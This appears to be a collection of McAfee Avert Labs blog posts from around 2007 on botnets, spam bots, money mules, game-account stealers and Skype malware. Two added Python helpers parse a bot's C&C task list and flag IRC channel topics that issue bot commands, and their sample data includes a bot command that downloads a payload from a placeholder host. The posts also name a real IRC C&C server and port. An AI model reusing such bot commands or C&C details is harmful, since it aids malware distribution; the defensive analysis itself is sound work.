    Toralv Dirro and Dirk Kollberg presented Trojans: A Reality Check at DefCon. This one was also very well received (I actually got to attend this one!) and they were swamped (maybe not the best choice of word but many people came up to the podium anyway) with questions afterward. They gave a great update on trojans in general as well as a technical dive into recent developments on the German malware scene. Dirk even showed a fascinating command and control demo that illustrated the ease of malware creation and control.

    Enjoy!

    The Zen of DefCon 15 Part 1

    DefCon gets quite a lot right and it is not just great content. Actually the content, IMHO, might be the LEAST important aspect to DefCon.

    Let’s be honest here. We are all infosec warriors in the information age. We all keep pretty much up to date on security research, malware developments, game hacking, etc…. on a daily basis. Blogs, forums, podcast and other mediums allow us to stay bleeding edge. We have to. Most information in most presentations at most conferences is a good 6 months old (not always, but usually). This is where DefCon distances itself from the pack.

    If you really want to see where security theory and research practicality collide (fueled by Brew and Coffee Wars!) then the floor of DefCon is the place to be. Truthfully, it is the activities of DefCon, not the presentations, that you need to get caffeinated for:

    * The Network @ DefCon
    * 0wn the b0x
    * Phreaking Challenge
    * CTF (if you gotta ask…….)
    * aCTF
    * LPCON5 - Lockpicking Contest
    * Hacker Jeopardy (one of my personal favorites)
    * TCP/IP Drinking Game
    * Wardriving Contest
    * Wireless Village - ChurchofWiFi
    * Lockpicking Village

    No disrespect to the presenters or any of their content but pwning-in-action is what makes DefCon well…….. DefCon. This is where the training, conferences and theory all meets the pavement. Can you get root? Can you stop someone from getting root? Do you really know what you are doing? Hey, is that a custom PWS variant that just pwned my data? Ohhhh, I never saw that evasion before!!! It is events like the above where the real education takes place.

Oh, and the Toxic BBQ! Part 2 later today…..

    Naughty Natalie

While I was going through my personal email last night, what turned out to be a spam email caught my eye. Coincidentally, it contained some references to something I’ve been researching recently: Facebook.

    First thing that came to my mind is that I was targeted because I have a .edu address, and Facebook was originally used solely by students. After spending a couple of minutes inspecting that spam, it was obvious that the spammer didn’t utilise Facebook in any technical manner but rather as a pure social-engineering trick to get people to read that spam.

    Natalie made her first appearance in that spam asking me to add her contact to my MSN Messenger account, because she thought that I was “hot” (yeah, right!). In a successful scenario, the recipient would have thought that “Natalie” has checked their profiles in Facebook and seen their main photo.

So, I created a new account to see where this spam would lead me. Natalie turned out to be an MSN bot :) with an “appealing” avatar. The bot didn’t engage in any real conversation; it only tried to get people “tempted” to step to the next stage. Natalie-the-bot used a couple of tricks to imitate human conversational behavior. Every time it sent me a lengthy message, it didn’t send it in one burst. First, I was shown the notice that Natalie was writing something, to give me the impression (and keep me on my toes) that a human was typing. Second, it sent me a .JPG attachment of a larger version of the avatar it used (which never arrived!). It was never meant to be delivered anyway!

    By the end of the “conversation” this spam was actually trying to get people to submit their credit card details in exchange for some live webcam shows by the infamous Natalie. Allegedly, there was a real Natalie which was causing all this noise. I hope that nobody has fallen for this or similar tricks.

    Fake advertising attempting to discredit Spamhaus

    Last Thursday we noticed a large spam campaign attempting to discredit Spamhaus and DDoS their phone lines. This is undoubtedly linked somehow to the massive and long-term DDoS attacks on the three major blacklists run by Spamhaus, URIBL and SURBL (the latter two are currently being protected by the DDoS Jedi at Prolexic). DDoS attacks on this scale are risky for the botmasters, since they expose the botnets to those interested in such things.

    Here is a copy of the mail:

    From: Christy June <fake-sender@fake_place.com>
    Date: Fri, 5 Jul 2007 20:34:52 +0100
    To: “some, one” <spamme@mcafee.com>
    Conversation: Which shalom myself magnetic
    Subject: What shalom herself magnetic

    WORKING TO PROTECT INTERNET NETWORKS WORLDWIDE
    Spamhaus tracks the Internet’s Spammers, Spam Gangs and Spam Services, provides dependable realtime anti-spam protection for Internet networks, and works with Law Enforcement to identify and pursue spammers worldwide.

    The SBL database is maintained by a dedicated international Spamhaus team based in 9 countries, working 24 hours a day, 7 days a week to list new confirmed spam issues and - just as importantly - to delist resolved issues.

    The Spamhaus Exploits Block List (XBL) is a realtime database of IP addresses of illegal 3rd party exploits, including open proxies (HTTP, socks, AnalogX, wingate, etc), worms/viruses with built-in spam engines, and other types of trojan-horse exploits.

    The Exploits Block List can be used by all modern mail servers, by setting your mail server’s anti-spam DNSBL feature (sometimes called “Blacklist DNS Servers” or “RBL servers”) to query xbl.spamhaus.org. Use of the XBL is free for users with normal mail servers (but networks with high email traffic should see DataFeed).

    You can get MUCH MORE if you contact us:

    The Spamhaus Project Ltd. 50 Churchill Square, Suite 6, Kings Hill, West Malling ME19 4YU United Kingdom, Tel (+44) 870 766 xxx

    This is not an uncommon event for RBL owners; this one is unusual only because of the size, duration and indiscriminate nature of the campaign.

    The spammer in this case also had to fake the sender’s address, because Spamhaus’s SPF record is of the “-all” variety, which sensibly denotes that they *only* permit one IP address to send mail for their domain, limiting the bots’ ability to deliver further.

    Obviously Spamhaus do not use botnets to send out promotional material ;)
    (If this all sounds a bit too fishy to be true you can read more about the traditional “Joe-Job” attack right here).

    FBI’s ‘Bot Roast’

    Are you one of the millions who’s been infected by a bot?

    If you have, the FBI wants to hear about it.

    The agency has recently launched “Operation Bot Roast” to coordinate and bring more visibility to their efforts to dismantle botnets. As part of the effort, they’re trying to get people who have been infected with bots to file a complaint through their Web site. If you know that you’ve been infected, please go and file a complaint report. Every report helps identify these criminals and bolster the case against them.

    (An anti-phishing reminder: The FBI will not contact you online and request your personal information–you must go to them to make the report.)

    So if you’ve been infected, you can do your part to make the net a safer place!

    Hello from HotBots ‘07

    Today marked the inaugural HotBots conference in Boston, MA. It was a relatively small crowd, also including a good number of academic researchers from schools around the country, gathered to talk about bots. There were 11 short presentations, a panel, and a number of very brief Work in Progress presentations. The content was decidedly great, running the gamut of bot-related topics. The future of botnets in peer to peer C&C channels, problems and techniques in counting the size of botnets, legal issues for botnet researchers, and some detailed break-downs of specific bots… it’s hard to focus on what info to relate, as there was so much good material!

    The first concept that struck me as interesting is that, again and again, people noted that the majority of bots are still your basic, vanilla IRC bots. The encrypted bots, the ones using custom IRC commands, the ones using P2P C&Cs, they’re the ones that people who monitor bots are finding less than 10% of the time. Why is this? Well, what reason do they have to upgrade right now? Even with relatively minor hardening, they’re finding very little resistance. It’s not really worth the investment to find or learn how to use the more cutting-edge technology. Which makes me wonder - why are we not seeing more IRC traffic filtering? Would you, as a consumer, pay for an ISP that kept the vast majority of bot traffic out of their network?

    The second concept that both made my hair stand on end and made me rather proud was the talk about the potential minefields for botnet researchers. There are all kinds of restrictions on the Good Guys about what they can and can’t do to protect their customers or their networks, with good reason. These restrictions protect the privacy of you and me as well as the Bad Guys, equally. If a researcher violates these restrictions to get at a Bad Guy, they risk drawing the wrath of the Bad Guy and all of his friends (maybe even their mafia employers), and perhaps their own government if that researcher were to damage evidence used in a criminal investigation. Perhaps this researcher will even run afoul of foreign governments if they’re the ones who’re being hampered by the damaged evidence, which could mean extradition to some place whose means of punishment are even less comfy than those in their home country.

    Here’s the proud part: Even with the restrictions, even with the looming dangers, there’s still a growing community of people who’re passionately pursuing an answer to these problems. It’s gone well beyond the borders of just the security industry now. We’re all still fighting, trying to make a dent in the growing tidal-wave of malware. It’s a community I’m very happy to be a part of, and I hope these community-building workshops continue to grow. With more and more eyes on the problem, perhaps some day we can stem the tide.

    Backdoor-DKV Author Gets Smart

    Looks like the Backdoor-DKV (aka IrnBot) author is getting smart–at least that’s what he thinks. Apparently he added some RE-avoiding mechanisms to his super-hyper-extra-modular lame bot. Which, by the way, does not prevent in ANY way the analysis of the bot. Fun, fun, fun! (For us, that is. :-)

    Bot Countermeasures

    Malware authors have been at the cutting edge of incorporating exploit code for zero-day vulnerabilities into their creations. Fueled by financial incentives and readily available source code, the bad guys of today aggressively pursue continued development of malware code. Over the years, the window between a vulnerability’s discovery and its incorporation into a worm or exploit candidate has shrunk from months, to weeks, to zero days. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their networks. And if, during this vulnerable time frame, the network is hit with a bot that uses a zero-day vulnerability, an organization could be faced with a potential worm outbreak or large-scale attack.

    The chart below shows the time frame between the vulnerability being reported and how long it took for malware authors to incorporate it into a worm candidate.

    Patch      Malware   Patch Availability   Worm Attack Date   Number of days for worm to appear
    --------   -------   ------------------   ----------------   ---------------------------------
    MS01-020   Nimda     Oct 17th, 2000       Sept 18th, 2001    335 Days
    MS02-061   Slammer   July 24th, 2002      Jan 25th, 2003     185 Days
    MS03-026   Blaster   July 16th, 2003      Aug 11th, 2003     26 Days
    MS04-011   Sasser    Apr 13th, 2004       Apr 30th, 2004     17 Days
    MS05-039   Zotob     Aug 09th, 2005       Aug 14th, 2005     5 Days
    MS06-040   Mocbot    Aug 08th, 2006       Aug 12th, 2006     4 Days

    The paper “Defeating bots on the internal network” from McAfee Avert Labs, published in the Feb 2007 issue of Virus Bulletin, describes setting up an IRC honeypot on a network using minimal resources and requiring little maintenance, to be used as an early warning system that proactively alerts on botnet activity. Also discussed is using the internal IRC honeypot to gain control over infected machines and remove the bot from them.

    Credit for Malware Writers?

    From time to time we see malware writers claim or ask for recognition of their malware. They usually leave messages in the virus body for the AV companies to see. They might ask for jobs, or offer help to detect something–you will never understand a malware writer’s mind.

    Today I was analyzing YAB (yet-another-bot) and found the following message in the virus body:

    “ATTN ANTIVIRUS EMPLOYEE: If you’re going to name my very nicely coded modular bot, at least give it the proper name of ‘[Name Removed]Bot.’ Lots of love, Author of [Name Removed]Bot.”

    Of course, we will NOT put the author’s name on the bot, so it will remain just a regular bot. :-)

    Offers from the Bot Economy

    Gee, I really feel like someone important these days. I’ve gotten 2 offers to join the bot economy this week alone!

    The most recent one was an email entitled “extra money fast and easy” offering me an “entry level opportunity in the field of financial services”. It starts right off sounding distinctly fishy and unprofessional:

    We are a small and relatively Software Development and Outsourcing Company specializing in enterprise application development, system integration, corporate networks and other software solutions for business, finance, and for various types of problems. The company based in Ukraine but at this time we open new office in Bulgaria.

    After some description of what they purport to do as a “company”, it then goes on to give a fairly good description of what all will be transpiring:

    If you are looking for a chance to make an additional profit you can become our representative in your country. As our representative you will receive 8% of every deal we conduct. Your job will be accepting funds in the form of wire transfers and check payments and forwarding them to us. It is not a full-time job, but rather a very convenient and fast way to receive additional income.

    The next paragraph is where we get a particularly odd incentive:

    Our financial professionals work with clients to help them achieve their many financial goals such as saving on taxes.

    Why yes, taking a cut of stolen funds is certainly one way to make untaxed income. The downside of this being that these mules are the ones who’re most easy to apprehend and prosecute.

    Another message I got the other day was via IM, coincidentally while I was at the ISOTF meeting. This one was discussing the other end of the bot economy:

    I sell things, adena, characters, a time of a card
    Pin codes the Internet of providers and mobile operators.
    In online games WoW.Lineage2
    ICQ dispatch is cheaper than at all…
    So ICQ numbers 5-6-place numbers cheaply.

    The first part of the email seems to have been in Russian, but it didn’t come through well, so I’m only including the translation which was included at the end. The first and third lines seem to be dealing with online game credentials. I’m not wholly sure what’s meant by “time of a card”. He also offers ISP and mobile passwords, along with hacked ICQ accounts. He’s a veritable one-stop shop for identity theft!

    Clearly they’re not being particularly picky about the recipients of these offers. Yet another illustration of how bot herders are using the shotgun approach. The first email was actually sent to my work address. You’d think they’d exclude AV company addresses from these things…

    The Frustration of Bot Fighters

    This last week I was among those at the “secretive conference” of security folks, ISPs and law-enforcement agents to discuss bots. Much like at last year’s VB conference, there was much discussion about the need for more cooperation and information-sharing between bot-fighters. Not just within the three groups but within each of the individual disciplines. People within all of the three groups were clear that none of us have all the pieces of the puzzle, and that in order for us to truly make a dent in the growth of bots and botnets, we need to share more of our information with each other.

    There has been much made of turf wars within the bot herder community, but the more notable thing in terms of fighting these bots is actually how much they’re cooperating. We know they’ve been pooling resources to code their bots, but apparently they’re also sharing botnet resources quite widely (for instance, to take down a particularly robust website that they wish to attack).

    There was a significant sense of frustration from all concerned about the lack of resources for the Good Guys, versus the rewards for the bot herders. Often an iron-clad case will be given to the relevant authorities, only to have the case go nowhere because the bot herders are minors and/or from a non-cooperative country.

    The good news in all this is that, while things may look dim at times, events like these can and do create a lot of good connections in important places. It’s about getting the right information to the right people to not only take down isolated pieces of the puzzle, but larger and more significant chunks of the gangs behind this crimeware.

    SPAM : Death by a thousand cuts!!

    In the “good old days” spammers aggressively scanned the Internet for open relay servers to send spam. Open relays are out of fashion these days. So much so that the Open Relay DataBase is shutting down due to changes in spammer tactics.

    Today’s spammers, in collusion with malware authors, infect thousands of machines on the Internet turning them into spam relay zombies. These zombie machines connect to a web server controlled by the spammer, which provides a constantly updated live feed of email addresses and content to spam. The content could be anything from pump-and-dump stock spams, online pharmaceutical drugs or the usual penis enlargement. Each individual zombie machine is capable of sending hundreds of spam emails per minute depending on the bandwidth available. Example: Spam-Maxy, Spam-Loot

    And with more machines having access to broadband and ADSL connections, it provides a fertile breeding ground for this unholy alliance of malware authors and spammers to take advantage of.

    At McAfee Avert Labs Bangalore, we sampled emails that were captured by our honeypot this quarter. The following chart shows the content of the email messages captured during in-house live testing of malware:

    Captured Email Content

    Only 11% constituted executable attachments. 2% were mails containing infection notifications or captured cached passwords that were meant for the trojan author. The rest, some 87%, was spam. A high percentage of this spammed content was image spam and ASCII art; techniques that spammers have effectively used to subvert traditional detection by anti-spam vendors.

    Although we have seen malware-controlled spam networks in the past, most notably the W32/Bagle and W32/Sober families, the complexity and sophistication seen in the W32/Stration and Spam-DComServ trojans of today, demonstrate the alarming advancements made by these digital miscreants. McAfee Avert Labs continues to keep a close watch on these recent developments in the spam world.

    IMs, VoIP and Spam

    Technologies advance with time, and Instant Messengers are no exception. Not long ago, people were happy sending text messages. Then VoIP came along and changed the scene, and IM vendors soon embraced it; many IM clients are now VoIP enabled. As soon as VoIP started going deeper into the mainstream, security researchers warned of related issues. One issue was abuse with spam, usually referred to as SPIT. Wikipedia describes SPIT as an “as-yet-nonexistent problem”. As VoIP gets more popular the scenario is changing fast, and this “as-yet-nonexistent problem” is slowly but surely emerging. The following image shows real-world VoIP spam over Skype.

    Real-Case Skype SPIT

    The image shows a typical spam prospect. The spammer starts a conference call with some random users and starts playing the spam message. This process is most likely not manual but automated with bots.

    Use and abuse are two sides of the same coin and this technology is no exception. All major IM providers are giving away SDKs to develop add-ons. However these SDKs also lower the bar for spammers to develop bots. We have witnessed the same with the ongoing development around Skype malware.

    The image below shows the assembly code for the loop which is used by Skype malware to search for users. You will notice the “SEARCH USERS” Skype APIs:

    Assembly loop showing the Skype SEARCH USERS API in use by Skype malware

    The malware actually uses more of these. The image below will highlight those:

    More Skype APIs in use by Skype Malware

    These APIs are part of the Skype SDK and are documented by Skype. It is just a matter of time before we start seeing bots in the wild built on top of the IM SDKs provided by the vendors. We advise users to be aware of this developing attack vector. McAfee Avert Labs is prepared for this battle!!

    Bot pangs - The pain of patching

    Malware authors have been proactive in including exploit code for almost every new vulnerability reported into bots, with utmost professionalism. Apart from the numerous Microsoft Windows vulnerabilities where exploit code has been methodically incorporated into bot code, McAfee Avert Labs is seeing a trend where popular applications from software vendors are being targeted. In recent weeks we have seen bots that target vulnerabilities or weak passwords in the following applications:

    Famatech Remote Admin http://vil.nai.com/vil/content/v_140984.htm
    Symantec Antivirus http://vil.nai.com/vil/content/v_140978.htm

    Although the vulnerabilities in the above software are dated and patches are available, bot authors still found them enticing enough to target machines running vulnerable versions of these applications.

    Other popular software applications with vulnerabilities that have been targeted by bots in the recent past include:

    Most of the major software vendors like Adobe, Microsoft and Oracle now follow a monthly patching cycle and administrators have their hands full in ensuring that every machine on the network is patched. Sadly, most administrators do not have the flexibility to deploy patches immediately to machines on the network for policy reasons. For example, the organization could be using legacy software which could break if a new service pack was applied and keeping these legacy applications running takes precedence over applying the latest hot fixes. In rare cases a fix could break something else in the operating system or adversely affect other applications. Administrators need more time to first deploy these hot fixes in a test environment and QA them properly before deploying them to the entire enterprise.

    Given the trend where malware authors are expanding their attack horizon by targeting vulnerable software applications, it wouldn’t be surprising if an exploit directed at popular instant messaging (IM) clients should surface. IM is popular both in consumer and corporate networks and an exploit that gives remote shell on a machine running an instant messenger would be stunningly effective.

    That being said, it will be interesting to wait, watch and revisit this topic if and when an instant messenger remote shell exploit surfaces.

    McAfee Avert Labs 2007 Threat Predictions PodCast

    Today, Avert Labs announced the availability of its podcast on the “Top Ten Security Trends in 2007”.

    As part of this podcast, McAfee will identify those threats it believes businesses and consumers will face in 2007 as computer criminals become more organized and professional in their approach.

    Download the podcast

    Watch a live spam bot in action.

    Ever wondered how a trojan infected computer gets its orders to spam? Take a peek with me into one trojan’s junkmail activities. The following account is happening as I type, and shows that some image spam is not unique even though it appears to be random.

    The SMTP-sending trojan first phones home for its task list, via HTTP on the SMTP port (25). Port 25 on the host machine is running Apache/1.3.37 — this is a very unusual place to find Apache running.

    The task list looks like this:

    $GET "http://example.com:25/outtask/urlTask8_c_2.txt?id=MAGID-ID-STRING&flag=1"
    10
    12|http://serv2.example.com/outtask/tasks/task_12_letter_1162390208.txt|
    http://get.example.com:8092/cgi-bin/cgi2.cgi|
    http://serv2.example.com/report2.cgi|1||
    http://mail.example.com:8888/cgi-bin/put|
    
    20|http://serv2.example.com/outtask/tasks/task_20_letter_1162390209.txt|
    http://get.example.com:8091/cgi-bin/cgi2.cgi|
    http://serv2.example.com/report2.cgi|1||
    http://mail.example.com:8888/cgi-bin/put|
    
    22|http://serv2.example.com/outtask/tasks/task_22_letter_1162390209.txt|
    http://get.example.com:8092/cgi-bin/cgi2.cgi|
    http://serv2.example.com/report2.cgi|1||
    http://mail.example.com:8888/cgi-bin/put|

    (line breaks and spaces added for readability)

    The response it got is in the following format:
    “tasknumber|spam-text URL|Address-list URL|Report address|1||Report address2|”

    So in the example above, the bot got 3 tasks. We’ll take a look at the first one in more detail….
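    A parser for this task-list format, as an added example (not code from the original post): it splits each record into the fields named above and collects the C&C host:port pairs the bot would contact, which is what you would feed to a block list or IDS rule. The sample response is constructed from the redacted example.com records shown, with each record on a single line as the bot actually receives it.

```python
"""Parse the spam bot's task list and extract its C&C endpoints.

Added example, not code from the original post.  Record layout as quoted
in the post: tasknumber|spam-text URL|Address-list URL|Report address|1||Report address2|
"""
from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample of the task-list response: the header line followed by
# three records, one per line (the post added line breaks for readability).
# Hosts are the post's own example.com placeholders, not real C&C hosts.
SAMPLE_RESPONSE = (
    "10\n"
    "12|http://serv2.example.com/outtask/tasks/task_12_letter_1162390208.txt|"
    "http://get.example.com:8092/cgi-bin/cgi2.cgi|"
    "http://serv2.example.com/report2.cgi|1||"
    "http://mail.example.com:8888/cgi-bin/put|\n"
    "20|http://serv2.example.com/outtask/tasks/task_20_letter_1162390209.txt|"
    "http://get.example.com:8091/cgi-bin/cgi2.cgi|"
    "http://serv2.example.com/report2.cgi|1||"
    "http://mail.example.com:8888/cgi-bin/put|\n"
    "22|http://serv2.example.com/outtask/tasks/task_22_letter_1162390209.txt|"
    "http://get.example.com:8092/cgi-bin/cgi2.cgi|"
    "http://serv2.example.com/report2.cgi|1||"
    "http://mail.example.com:8888/cgi-bin/put|\n"
)


@dataclass(frozen=True)
class SpamTask:
    number: int
    spam_text_url: str      # template of the spam message to send
    address_list_url: str   # live feed of addresses to spam
    report_url: str         # where the bot reports delivery results
    flag: str               # the constant "1" field; its meaning is not stated in the post
    report_url2: str        # second report address


def parse_task_list(body: str) -> tuple[str, list[SpamTask]]:
    """Parse the raw HTTP response body into (header line, tasks).

    A record that does not match the documented layout raises ValueError,
    so a changed C&C format is noticed rather than silently misparsed.
    """
    lines = [ln.strip() for ln in body.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty task list")
    header, tasks = lines[0], []
    for rec in lines[1:]:
        fields = rec.split("|")
        # Seven separators give eight fields; the empty field and the
        # trailing "|" both show up as "".
        if len(fields) != 8 or fields[5] != "" or fields[7] != "":
            raise ValueError(f"unexpected record layout: {rec!r}")
        tasks.append(SpamTask(int(fields[0]), fields[1], fields[2],
                              fields[3], fields[4], fields[6]))
    return header, tasks


def c2_endpoints(tasks: list[SpamTask]) -> list[tuple[str, int]]:
    """Distinct (host, port) pairs the bot will contact for these tasks."""
    seen: set[tuple[str, int]] = set()
    for t in tasks:
        for url in (t.spam_text_url, t.address_list_url, t.report_url, t.report_url2):
            u = urlsplit(url)
            if u.hostname:
                seen.add((u.hostname, u.port or 80))
    return sorted(seen)


if __name__ == "__main__":
    hdr, found = parse_task_list(SAMPLE_RESPONSE)
    print(f"header={hdr!r}, {len(found)} tasks")
    for host, port in c2_endpoints(found):
        print(f"block {host}:{port}")
```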

    Not all bot-money is made in “cyberspace”

    There’s something that I’ve been hearing mentioned a lot lately, particularly from those in law enforcement circles: the importance of “mules” in bot-related money making schemes. These are work-at-home type jobs which are offered through very professional-looking websites, through classified ads, and even through IM. These are a crucial part of the reason so many bots are able to be run from places around the globe. In order to get merchandise (often to re-sell) or cash with stolen credit card credentials, the thieves have to go through stricter regulations if the goods are going to another country. To get around these regulations, they use these mules within those originating countries.

    These mules are often someone who’s desperate for money or someone who figures it’ll be the (unfortunately fictitious) company who’d get in trouble rather than themselves, so they tend to ask few questions of their “employers”. Laws in most countries are better able to handle this sort of trafficking of stolen goods, so it tends to be these small-time players who are most often prosecuted within the web of illegal botnet activities.

    Bots and botting…. A Lost Cause?

    There’s been discussion lately about whether we’ve already lost the war against malicious bots. Certainly things are looking fairly grim as the rise in the number of variants of IRC bots has grown by leaps and bounds over the last couple of years. Strictly using string-based detection against the unending tide certainly appears to be a lost cause.

    On the other hand, there are some more promising developments in recent years:

    • Most AV vendors at this point have gone to using some sort of generic detection or behavior-based heuristics against the most popular bot-families, which can proactively detect a certain amount of new bots
    • Firewalls and IDS/IPS products are becoming more widely used, even by home users
    • Many corporations are blocking IRC traffic
    • ISPs are increasingly involved with security groups that have developed to shut down Command & Control channels used by bots

    From my perspective, I see a few things being particularly important in solving the bot problem:

    • Further cooperation of security companies and ISPs in order to get more C&Cs shut down
    • Further cooperation of security companies, ISPs and Law Enforcement agencies in order to ensure more bot masters face legal action
    • ISPs offering more security services than simply AV software (e.g. traffic filtering)
    • More security information being available to novice users (e.g. http://pbskids.org/license/)
    • More accountability for adware vendors who fund these malicious affiliates
    • A paradigm shift, particularly in the home user area, to a security strategy of strategically allowing known-good traffic rather than strategically blocking known-bad traffic

    What are your thoughts on the general state of things?

    Have the Bot Wars been lost? What more could be done to ensure that Bot Masters don’t make the internet completely unusable?

    W32/Stration - The new “old” kid in town

    Today’s mass mailers are often seeded from thousands of zombie drones connected to botnets. Time on a botnet can be bought, for the right price, to launch the next mass mailer variant. Then when these zombies are instructed to download and execute a worm, a mini outbreak can be created when thousands of machines over the internet simultaneously start mailing copies of the worm. However, these artificial outbreaks die by themselves when antivirus vendors come out with updated detection for the worm.

    By using enticing subjects and message bodies and spoofing the ‘from’ address to appear from trusted sources, mass mailers have traditionally depended on social engineering techniques to get a victim into executing a malware attachment. Given that mass mailers seem out of vogue these days with malware authors focusing on more effective infection vectors like operating system or browser vulnerabilities, it’s nostalgic when we see a new “old” kid in town.

    W32/Stration is a mass mailer that has been around since August this year and is one of the few active and evolving mass mailers in recent times. Very typical of the mass mailing variety, W32/Stration harvests email addresses from an infected machine and mails a copy of itself using some convincing message bodies.

    A sample spoofed email message is as follows:

    “Our firewall determined the e-mails containing worm copies are being sent from your computer. Nowadays it happens from many computers, because this is a new virus type (Network Worms). Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of itself to these e-mail addresses. Please install updates for worm elimination and your computer restoring.”

    Leaving out the poor grammar, such a dire message appearing to come from the administrator of your company could be stunningly effective in getting uninformed users to take the bait.

    W32/Stration uses a self-updating mechanism to keep itself going. Infected machines connect to a hard-coded URL in the body of the worm to download a possibly newer version of the worm and execute it. This ensures that the worm remains undetected for an extended period of time and has a longer shelf life in the wild.

    The author seems to be investing considerable time and effort into unleashing newer variants of W32/Stration on to the internet. But it’s surprising that no lucrative payloads like adware or password stealing trojans have been seeded onto infected machines. One can only wonder about the objective behind developing and releasing newer variants of this worm. Is the current wave being used to build a massive pool of infected computers for a larger scale of attack on the internet? Sadly, the motive behind unleashing this worm is still unknown at the time of writing this blog. McAfee Avert Labs continues to keep a close eye on future developments of W32/Stration.

    It’s all in the Game!!

    The online gaming industry has matured into a serious business with revenues running into the billions of dollars. As we know, once something gains popularity on the Internet and is profitable, it becomes an attractive target for hackers.

    In the early days, game crackers spent quality time breaking cd protection or gaining secret codes to unlock hidden weapons and levels. With the advent of both Online Games and Massively-Multiplayer Online Role Playing Games (MMORPG), official gaming networks now require legitimate cd keys and/or registered accounts to logon and play online. Virus authors responded by unleashing a rash of trojan horse programs masquerading as game cheats or trainers in order to steal cd keys of Online Games. To get a victim to run these trojans, these files were posted on bulletin board systems, internet relay chat channels or on popular gaming site forums. But the intended victim still had to download and execute the trojan for the ploy to work.

    So the obvious question was “How to make a self-spreading game CD key stealer?” Sdbots and Gaobot with multiplying capabilities via exploits and weak passwords were readily available at that time. It wasn’t long before a module was written and introduced in the bot code to steal game CD keys of popular online games from Electronic Arts, id Software, Red Storm and Valve. Fortunately most of the bots in the wild these days have dropped this functionality, as the popularity of some online games has waned recently.

    Massively-Multiplayer Online Role Playing Games like Lineage, World of Warcraft and the Final Fantasy series rule the gaming world today, with an insane number of hardcore gamers competing against each other in the virtual world. Every day, McAfee Avert Labs receives numerous malware samples designed to steal game account information for popular game titles. And in a shift away from trojan horse programs masquerading as game cheats, we are seeing a trend where virus authors are writing old-school viruses like W32/Bacalid, W32/Detnat and W32/Philis that target popular role playing games.

    Are these guys doing it for the love of the game? Nope.. sounds too good to be true. Underground RMT (Real-Money trading) groups thrive in dealing with stolen game accounts and operate mostly out of Asia. And with a player’s stolen account information, their virtual assets can be transferred to another players account or simply auctioned off and sold for real money. This phenomenon is currently region specific but could easily reach menacing proportions similar to the threats plaguing online internet banking.

    Autopilot IRCBots - smart and funny

    A vast majority of IRC based bots seen these days can be said to be on “Autopilot” in a sense. After joining a pre-defined IRC channel the bots read channel topics and accept them as commands. Authors of such bots just need to set these channels up with correct commands and then leave it up to the bots to spread and possibly go and earn money for their authors.

    In general, such bots perform the following steps

    1. Query for the domain where the IRC server resides
    2. Try to connect to an IRC server at some predefined set of ports
    3. Once connected to the IRC server, join a predefined channel by issuing “JOIN <channel>”
    4. Read the topic for the channel and accept it as a command

    Generally, the topic of the first channel instructs the bot to join other channels, whose topics may in turn cause the bot to execute various commands or join still more channels. The major functions that such bots perform for their author are: i) spread: increase the size of the botnet by scanning the network and infecting other vulnerable machines; ii) earn money: by downloading adware, stealing personal information, etc.

    Different bots may connect to different domains, ports and channel names and may download different adware, but the overall working mechanism remains the same: once the channel topics have been set, they all go about on their own, adding more machines to the botnet and earning money automatically. While his bots are on autopilot the author may have fun relaxing, or maybe spend his time on things like researching new vulnerabilities to exploit, rather than sitting in a channel issuing the same commands to each new machine that joins.

    Some such bots have a funny side too, where they display funny messages along with the IRC banner returned. One example of such a bot is W32/Sdbot.worm.gen.h, which connects to forum.ednet.es on port 4915. The channel is still active at the time of writing. Click here to see a screenshot of the message returned from the server.

    McAfee Avert Labs has been observing such behavior lately, and it has also been talked about recently. Even though it claims to be one, this is not a “legit botnet”. It will happily issue commands to a bot to scan the network for vulnerable hosts and infect them. In fact, it is as insidious as any other botnet.

    One can only see this message by connecting to the server with an IRC client or by looking at the bot’s communication in an Ethereal dump. A normal user whose machine is infected will never see it. So, whom is this message intended for?

    Possibly it is just intended for the “readers” who analyze such threats. Every once in a while we see a malicious executable that carries a few strings just for fun, or to challenge the person analyzing the memory dumps. Similarly, I think this is just the fun part that malware authors and AV researchers share.

    Or, if you like, it can be called a social engineering technique: malware writers may use it to try to fool “readers” into believing that this channel, even if part of a botnet, is actually legitimate. It is, however, unlikely to stop researchers from adding detection for such bots, nor will it prevent the IRC channel from being taken down once discovered.

    Such “special” responses could also potentially be used to obfuscate/encode information being conveyed to the bot.
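    As an added example (not code from the original post), a small Python helper in the spirit of reading the bot’s traffic out of a packet capture: it parses IRC server messages, collects channel topics from RPL_TOPIC (332) replies and TOPIC changes, and flags topics that look like autopilot instructions rather than chat. The transcript, server name and channel names are constructed for the example.

```python
import re

def parse_irc_line(line: str):
    """Split one RFC 1459 style line into (prefix, command, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):                 # ":server" or ":nick!user@host"
        prefix, _, line = line[1:].partition(" ")
    body, sep, trailing = line.partition(" :")  # trailing carries the topic text
    parts = body.split()
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else "")

def channel_topics(lines) -> dict:
    """Map channel -> latest topic from RPL_TOPIC (332) replies or TOPIC changes."""
    topics = {}
    for raw in lines:
        _, command, params, trailing = parse_irc_line(raw)
        if command == "332" and len(params) >= 2:   # :server 332 nick #chan :text
            topics[params[1]] = trailing
        elif command == "TOPIC" and params:         # :who TOPIC #chan :text
            topics[params[0]] = trailing
    return topics

def flag_autopilot_topics(topics: dict) -> dict:
    """Heuristics for topics that read like instructions to a bot rather than chat."""
    findings = {}
    for chan, topic in topics.items():
        reasons = []
        if topic.startswith((".", "!", "$", "@")):
            reasons.append("command-style prefix")
        if re.search(r"#\w+", topic):
            reasons.append("points to another channel")
        if re.search(r"(?:https?|ftp)://\S+", topic):
            reasons.append("contains download URL")
        if reasons:
            findings[chan] = reasons
    return findings

# Constructed server-to-client transcript following the four steps above; not a real capture.
SAMPLE_SESSION = [
    ":bot1!x@10.0.0.5 JOIN :#lobby",
    ":irc.example.invalid 332 bot1 #lobby :.join #work",
    ":bot1!x@10.0.0.5 JOIN :#work",
    ":irc.example.invalid 332 bot1 #work :.download http://example.invalid/update.exe",
    ":irc.example.invalid 332 bot1 #chat :Welcome, be nice to each other",
]

if __name__ == "__main__":
    for chan, why in flag_autopilot_topics(channel_topics(SAMPLE_SESSION)).items():
        print(chan, "->", ", ".join(why))
```

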